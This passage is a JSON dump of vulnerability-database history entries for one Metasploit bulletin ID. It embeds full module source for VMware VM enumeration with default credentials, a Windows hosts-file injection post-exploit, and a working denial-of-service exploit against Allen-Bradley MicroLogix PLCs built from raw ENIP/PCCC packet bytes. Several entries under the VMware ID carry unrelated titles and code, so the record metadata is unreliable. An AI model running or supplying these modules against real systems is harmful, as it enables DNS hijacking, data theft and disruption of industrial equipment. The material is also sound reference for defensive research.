#{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-12T23:50:34", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 42}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "137859935acb63f07406ae0f0bb7738f", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Manage Hosts File Injection", "description": "This module allows the attacker to insert a new entry into the target system's hosts file.\n", "published": "2011-10-23T17:17:32", "modified": "2018-06-12T22:11:29", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-15T22:00:08", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 2.6, "vector": "NONE", "modified": "2019-10-12T23:50:34"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:4807024198181683902", "KITPLOIT:753502859102214522", "KITPLOIT:6224374959360025978", "KITPLOIT:5984639588103234893", "KITPLOIT:7842853011213233978", "KITPLOIT:3364109522322011176"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BC6F07233A684778F6CA4B2B7C28B45B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154823"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876895", "OPENVAS:1361412562310876896", "OPENVAS:1361412562310844199", "OPENVAS:1361412562310852737", "OPENVAS:1361412562310815497", "OPENVAS:1361412562310815496", "OPENVAS:1361412562310815495"]}, {"type": "cve", "idList": ["CVE-2019-5527", "CVE-2019-5535"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:86C26266774161075BFD1BBE158CE9EE"]}, {"type": "redhat", "idList": ["RHSA-2019:2995"]}, {"type": "mskb", "idList": ["KB4052908"]}], "modified": "2019-10-12T23:50:34"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/manage/inject_host.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Manage Hosts File Injection',\n 'Description' => %q{\n This module allows the attacker to insert a new entry into the target\n system's hosts file.\n },\n 'License' => BSD_LICENSE,\n 'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n\n register_options(\n [\n OptString.new('DOMAIN', [ true, 'Domain name for host file manipulation.' ]),\n OptString.new('IP', [ true, 'IP address to point domain name to.' ])\n ])\n end\n\n\n def run\n if datastore['IP'].nil? or datastore['DOMAIN'].nil?\n print_error(\"Please specify both DOMAIN and IP\")\n return\n end\n\n ip = datastore['IP']\n hostname = datastore['DOMAIN']\n\n # Get a temporary file path\n meterp_temp = Tempfile.new('meterp')\n meterp_temp.binmode\n temp_path = meterp_temp.path\n\n begin\n # Download the remote file to the temporary file\n client.fs.file.download_file(temp_path, 'C:\\\\WINDOWS\\\\System32\\\\drivers\\\\etc\\\\hosts')\n rescue Rex::Post::Meterpreter::RequestError => re\n # If the file doesn't exist, then it's okay. Otherwise, throw the\n # error.\n if re.result != 2\n raise $!\n end\n end\n\n print_status(\"Inserting hosts file entry pointing #{hostname} to #{ip}..\")\n hostsfile = ::File.open(temp_path, 'ab')\n hostsfile.write(\"\\r\\n#{ip}\\t#{hostname}\")\n hostsfile.close()\n\n client.fs.file.upload_file('C:\\\\WINDOWS\\\\System32\\\\drivers\\\\etc\\\\hosts', temp_path)\n print_good(\"Done!\")\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-15T22:00:08", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 43}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-16T00:28:48", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2019-10-16T00:28:48"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:6910250162001955125", "KITPLOIT:5655524805475386986", "KITPLOIT:2505267191039065451", "KITPLOIT:7691462746351557369", "KITPLOIT:1196637704566845990", "KITPLOIT:4240899114032251786", "KITPLOIT:4807024198181683902", "KITPLOIT:753502859102214522", "KITPLOIT:6224374959360025978"]}, {"type": "mskb", "idList": ["KB4511553"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876912", "OPENVAS:1361412562310704543", "OPENVAS:1361412562310876911", "OPENVAS:1361412562310844200", "OPENVAS:1361412562310891959", "OPENVAS:1361412562310876909", "OPENVAS:1361412562310876910", "OPENVAS:1361412562310852738"]}, {"type": "symantec", "idList": ["SMNTC-110417", "SMNTC-110406"]}], "modified": "2019-10-16T00:28:48"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-16T00:28:48", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 44}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "28194f60c85b05baa330fca838e4777c", "type": "metasploit", "bulletinFamily": "exploit", "title": "DoS Exploitation of Allen-Bradley's Legacy Protocol (PCCC)", "description": "A remote, unauthenticated attacker could send a single, specially crafted Programmable Controller Communication Commands (PCCC) packet to the controller that could potentially cause the controller to enter a DoS condition. MicroLogix 1100 controllers are affected: 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, and 1763-L16DWD. CVE-2017-7924 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned.\n", "published": "2018-12-11T14:48:11", "modified": "2019-01-22T13:33:24", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7924", "https://ics-cert.us-cert.gov/advisories/ICSA-17-138-03", "http://dl.acm.org/citation.cfm?doid=3174776.3174780"], "cvelist": ["CVE-2017-7924"], "lastseen": "2019-10-18T20:23:34", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2019-10-18T20:23:34"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-7924"]}, {"type": "ics", "idList": ["ICSA-17-138-03"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/SCADA/ALLEN_BRADLEY_PCCC"]}], "modified": "2019-10-18T20:23:34"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/scada/allen_bradley_pccc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Udp\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(\n 'Name' => \"DoS Exploitation of Allen-Bradley's Legacy Protocol (PCCC)\",\n 'Description' => %q{\n A remote, unauthenticated attacker could send a single, specially crafted\n Programmable Controller Communication Commands (PCCC) packet to the controller\n that could potentially cause the controller to enter a DoS condition.\n MicroLogix 1100 controllers are affected: 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, and\n 1763-L16DWD.\n CVE-2017-7924 has been assigned to this vulnerability.\n A CVSS v3 base score of 7.5 has been assigned.\n },\n 'Author' => [\n 'Jos\u00e9 Diogo Monteiro <jdlopes[at]student.dei.uc.pt>',\n 'Luis Rosa <lmrosa[at]dei.uc.pt>',\n 'Miguel Borges de Freitas <miguelbf[at]dei.uc.pt>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2017-7924' ],\n [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-138-03' ],\n [ 'URL', 'http://dl.acm.org/citation.cfm?doid=3174776.3174780']\n ])\n register_options([Opt::RPORT(44818),])\n end\n\n VULN_LIST = ['1763-L16BWA','1763-L16AWA','1763-L16BBB','1763-L16DWD']\n VULN_FW_VERSION_MIN = 14.00\n VULN_FW_VERSION_MAX = 16.00\n def le_pp(s)\n \"0x#{Rex::Text.to_hex(s, prefix=\"\").scan(/../).reverse.join(\"\")}\"\n end\n\n def enip_register_session_pkt\n # ENIP encapsulation Header\n \"\\x65\\x00\" + # Command register session (0x0065)\n \"\\x04\\x00\" + # Lenght (4)\n \"\\x00\\x00\\x00\\x00\" + # Session handle (0x00000000)\n \"\\x00\\x00\\x00\\x00\" + # Status success (0x00000000)\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" + # Sender context (0x0000000000000000)\n \"\\x00\\x00\\x00\\x00\" + # Options (0x00000000)\n # Protocol Specific Data\n \"\\x01\\x00\" + # Protocol version (1)\n \"\\x00\\x00\" # Option flags (0x00000000)\n end\n\n def enip_ccm_forward_open_pkt(enip_session_handle)\n # ENIP encapsulation header\n \"\\x6f\\x00\" + # Send RR data (0x006f)\n \"\\x3e\\x00\" + # Lenght (63)\n enip_session_handle + # Session handle (retrieved from register session)\n \"\\x00\\x00\\x00\\x00\" + # Status success (0x00000000)\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" + # Sender context (0x0000000000000000)\n \"\\x00\\x00\\x00\\x00\" + # Options (0x00000000)\n # Command specific data\n \"\\x00\\x00\\x00\\x00\" + # Interface handle (CIP = 0x00000000)\n \"\\x00\\x00\" + # Timeout (0)\n \"\\x02\\x00\" + # Item count (2)\n \"\\x00\\x00\" + # Item 1 type id (Null address item)\n \"\\x00\\x00\" + # Item 1 length (0)\n \"\\xb2\\x00\" + # Item 2 type id (Unconnected data item)\n \"\\x2e\\x00\" + # Item 2 length (46)\n # CIP Connection manager specific data\n \"\\x54\\x02\\x20\\x06\\x24\\x01\\x0a\\xf0\" +\n \"\\x00\\x00\\x00\\x00\\x52\\xac\\xda\\x89\" +\n \"\\x55\\x0c\\x35\\x01\\xe1\\x08\\xb0\\x60\" +\n \"\\x07\\x00\\x00\\x00\\x00\\x40\\x00\\x00\" +\n \"\\x12\\x43\\x00\\x40\\x00\\x00\\x12\\x43\" +\n \"\\xa3\\x02\\x20\\x02\\x24\\x01\"\n end\n\n # Any combination of File Number 0x02\u20130x08 and File Type 0x48 or 0x47 will trigger a Major Error (0x08)\n def pccc_dos_pkt(enip_session_id, cip_connection_id)\n # ENIP encapsulation header\n \"\\x70\\x00\" + # Send unit data (0x0070)\n \"\\x2d\\x00\" + # Length\n enip_session_id + # ENIP session handle (obtained from enip register session)\n \"\\x00\\x00\\x00\\x00\" + # Status Success\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" + # Sender context\n \"\\x00\\x00\\x00\\x00\" + # Options\n # Command Specific data\n \"\\x00\\x00\\x00\\x00\" + # Interface handle (CIP)\n \"\\x00\\x00\" + # Timeout (0)\n \"\\x02\\x00\" + # Item count\n \"\\xa1\\x00\" + # Item 1 - Type ID (Connected address item)\n \"\\x04\\x00\" + # Item 1 - Length (4)\n cip_connection_id + # CIP connection ID (obtained from CIP CM packet)\n \"\\xb1\\x00\" + # Item 2 - Type ID (Connected data item)\n \"\\x19\\x00\" + # Item 2 - Length (25)\n \"\\x01\\x00\" + # Item 2 - CIP Sequence Count (1) - first packet\n # PCCC Command data\n \"\\x4b\" + # Execute PCCC (0x4b)\n \"\\x02\\x20\\x67\\x24\\x01\" + # no idea what this is\n \"\\x07\" + # Requestor ID length\n \"\\x35\\x01\" + # CIP vendor ID\n \"\\xe1\\x08\\xb0\\x60\" + # CIP serial number\n \"\\x0f\" + # Command code\n \"\\x00\" + # Status (success 0x00)\n \"\\x2a\\x58\" + # Transaction code\n \"\\xa2\" + # Function code (Protected typed logical read with three address fields)\n \"\\x00\" + # Byte size\n \"\\x05\" + # File number\n \"\\x47\" + # File type\n \"\\x00\" + # Element number\n \"\\x00\" # Sub-element number\n end\n\n def enip_list_identify_pkt\n \"\\x63\\x00\" + # List Identity\n \"\\x00\\x00\" + # Length\n \"\\x00\\x00\\x00\\x00\" + # Session Handle\n \"\\x00\\x00\\x00\\x00\" + # Status: Success\n \"\\x00\\x00\" + # Max Response Delay\n \"\\x00\\x00\\xc1\\xde\\xbe\\xd1\" + # Sender Context\n \"\\x00\\x00\\x00\\x00\" # Options\n end\n\n\n def check\n\n connect_udp\n\n udp_sock.put(enip_list_identify_pkt)\n res = udp_sock.recvfrom(90)\n\n disconnect_udp\n\n unless res && res[0].length > 63 && res[0][0,2] == \"\\x63\\x00\"\n print_error \"EtherNet/IP Packet Not Valid\"\n return Exploit::CheckCode::Unsupported\n end\n\n revision = res[0][54,2]\n product_name_len = res[0][62].unpack(\"c*\")[0]\n\n\n product_name = res[0][63,product_name_len]\n print_status \"Product Name: #{product_name}\"\n\n array = product_name.split(' ')\n plc_model = array[0]\n\n return Exploit::CheckCode::Safe unless VULN_LIST.any? { |e| plc_model.include? e }\n\n firmware = array[1]\n begin\n firmware_nbr = firmware.scan(/(\\d+[.,]\\d+)/).flatten.first.to_f\n if firmware_nbr >= VULN_FW_VERSION_MIN && firmware_nbr < VULN_FW_VERSION_MAX\n return Exploit::CheckCode::Vulnerable\n elsif firmware_nbr < VULN_FW_VERSION_MIN\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Safe\n end\n rescue\n return Exploit::CheckCode::Unknown\n end\n\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n ensure\n disconnect\n end\n\n def run\n connect\n # Register Ethernet/IP session\n sock.put(enip_register_session_pkt)\n enip_register_session_ans = sock.get_once\n unless enip_register_session_ans && enip_register_session_ans.length == 28 && enip_register_session_ans[0,2] == \"\\x65\\x00\"\n print_error \"Ethernet/IP - Failed to create session.\"\n disconnect\n return\n end\n enip_session_id = enip_register_session_ans[4, 4]\n print_status \"Ethernet/IP - Session created (id #{le_pp(enip_session_id)})\"\n\n # Ethernet/IP CCM Forward Open\n sock.put(enip_ccm_forward_open_pkt(enip_session_id))\n enip_ccm_forward_open_ans = sock.get_once\n unless enip_ccm_forward_open_ans && enip_ccm_forward_open_ans.length > 48 && enip_ccm_forward_open_ans[0,2] == \"\\x6f\\x00\"\n print_error \"CIP Connection Manager - Failed Forward Open request\"\n disconnect\n return\n end\n cip_connection_id = enip_ccm_forward_open_ans[44, 4]\n print_status \"CIP Connection Manager - Forward Open Success (Connection id #{le_pp(cip_connection_id)})\"\n\n # PCCC DoS packet\n print_status \"Sending PCCC DoS magic packet...\"\n sock.put(pccc_dos_pkt(enip_session_id, cip_connection_id))\n\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n ensure\n disconnect\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-18T20:23:34", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 45}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-18T22:26:23", "history": [], "viewCount": 8, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2019-10-18T22:26:23"}, "dependencies": {"references": [{"type": "talosblog", "idList": ["TALOSBLOG:5A9BEF09DC8FF93E258E2D51361D11E8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310844204", "OPENVAS:1361412562310852742", "OPENVAS:1361412562310891964", "OPENVAS:1361412562310891960", "OPENVAS:1361412562310844203", "OPENVAS:1361412562310891963", "OPENVAS:1361412562310852741", "OPENVAS:1361412562310852740", "OPENVAS:1361412562310852739", "OPENVAS:1361412562310704544"]}, {"type": "kitploit", "idList": ["KITPLOIT:3183871074537790421", "KITPLOIT:2344644233227216723", "KITPLOIT:1769715006679995681", "KITPLOIT:3279952724098873222"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:F266AF4E1B844432A13D20C10EEA9875"]}, {"type": "thn", "idList": ["THN:90DFF9FABBF66A04D2919203A9E83670"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154892"]}, {"type": "mskb", "idList": ["KB4512501"]}, {"type": "threatpost", "idList": ["THREATPOST:230752420028AE1D30E54F7A1FB136FB"]}], "modified": "2019-10-18T22:26:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-18T22:26:23", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "1f3319070d27778afbebe91c42ff24c6", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-23T16:30:27", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2019-10-23T16:30:27"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310704548", "OPENVAS:1361412562310704547", "OPENVAS:1361412562310143041", "OPENVAS:1361412562310143042", "OPENVAS:1361412562310891968", "OPENVAS:1361412562310108682", "OPENVAS:1361412562310891961", "OPENVAS:1361412562310891967", "OPENVAS:1361412562310704546", "OPENVAS:1361412562310113545"]}, {"type": "talos", "idList": ["TALOS-2019-0857"]}, {"type": "threatpost", "idList": ["THREATPOST:9BC1B113CDD3C86D30DEB5648D4DB177"]}, {"type": "redhat", "idList": ["RHSA-2019:3172"]}, {"type": "tenable", "idList": ["TENABLE:0233D53A82E16C59E35C51B21491BD62"]}, {"type": "thn", "idList": ["THN:9269E53DB7E4D99ED8A3314F02869A30"]}, {"type": "mozilla", "idList": ["MFSA2019-34", "MFSA2019-33"]}, {"type": "symantec", "idList": ["SMNTC-110570"]}], "modified": "2019-10-23T16:30:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-23T16:30:27", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-23T20:26:07", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2019-10-23T20:26:07"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310704548", "OPENVAS:1361412562310704547", "OPENVAS:1361412562310143041", "OPENVAS:1361412562310143042", "OPENVAS:1361412562310891968", "OPENVAS:1361412562310108682", "OPENVAS:1361412562310891967", "OPENVAS:1361412562310891961", "OPENVAS:1361412562310891962", "OPENVAS:1361412562310113545"]}, {"type": "threatpost", "idList": ["THREATPOST:9BC1B113CDD3C86D30DEB5648D4DB177"]}, {"type": "redhat", "idList": ["RHSA-2019:3172"]}, {"type": "tenable", "idList": ["TENABLE:0233D53A82E16C59E35C51B21491BD62"]}, {"type": "thn", "idList": ["THN:9269E53DB7E4D99ED8A3314F02869A30"]}, {"type": "symantec", "idList": ["SMNTC-110570"]}, {"type": "mozilla", "idList": ["MFSA2019-34", "MFSA2019-33"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:F049AE2BB0739D7D9D8E368907DF1C29"]}], "modified": "2019-10-23T20:26:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include 